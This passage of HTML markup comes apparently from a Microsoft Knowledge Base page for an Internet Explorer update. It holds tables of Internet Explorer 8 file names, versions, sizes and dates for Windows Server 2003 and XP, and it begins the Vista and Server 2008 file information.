class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Xpshims.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 8 on all supported 32-bit versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.23532</td><td class=\"sbody-td\">18,944</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.23532</td><td class=\"sbody-td\">385,024</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">20:51</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">174,592</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:47</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.23532</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">743,424</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">11,113,472</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">184,320</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">247,808</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">2,006,016</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,469,440</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">522,240</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">43,520</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">630,272</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">55,296</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">6,017,536</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">67,072</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">611,840</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">206,848</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">105,984</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,215,488</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">759,296</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">920,064</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Xpshims.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 8 on all supported x64-based versions of Windows Server 2003 and Windows XP Professional </h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.23532</td><td class=\"sbody-td\">23,040</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.23532</td><td class=\"sbody-td\">479,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">70,656</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.23532</td><td class=\"sbody-td\">459,776</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,019,904</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">12,512,768</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">252,928</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">718,848</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">2,358,272</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,539,072</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">502,272</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">31,744</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">56,832</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">742,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">9,344,000</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">98,304</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,062,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">243,712</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">108,032</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,493,504</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,028,096</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,151,488</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Xpshims.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wcorpol.dll</td><td class=\"sbody-td\">2008.0.0.23532</td><td class=\"sbody-td\">18,944</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Whtml.iec</td><td class=\"sbody-td\">2018.0.0.23532</td><td class=\"sbody-td\">385,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">174,592</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.23532</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiedvtool.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">743,424</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieframe.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">11,113,472</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiepeers.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">184,320</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieproxy.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">247,808</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiertutil.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">2,006,016</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Winetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,469,440</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wjsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">522,240</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wjsproxy.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wlicmgr10.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">43,520</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsfeeds.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">630,272</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">55,296</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtml.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">6,017,536</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtmled.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">67,072</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmstime.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">611,840</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Woccache.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">206,848</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurl.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">105,984</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurlmon.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,215,488</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wvgx.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">759,296</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wwininet.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">920,064</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wxpshims.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Windows Vista and Windows Server 2008 file information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (SP<strong class=\"sbody-strong\">n</strong>), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table:<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Version</span></td><td class=\"sbody-td\"><span class=\"text-base\">Product</span></td><td class=\"sbody-td\"><span class=\"text-base\">Milestone</span></td><td class=\"sbody-td\"><span class=\"text-base\">Service branch</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">2</span>. <span class=\"text-base\">18</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">2</span>. <span class=\"text-base\">23</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes. </li></ul><span class=\"text-base\">Note</span> The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.<br/><h3 class=\"sbody-h3\">Internet Explorer 7</h3><h4 class=\"sbody-h4\">Internet Explorer 7 on all supported 32-bit versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table 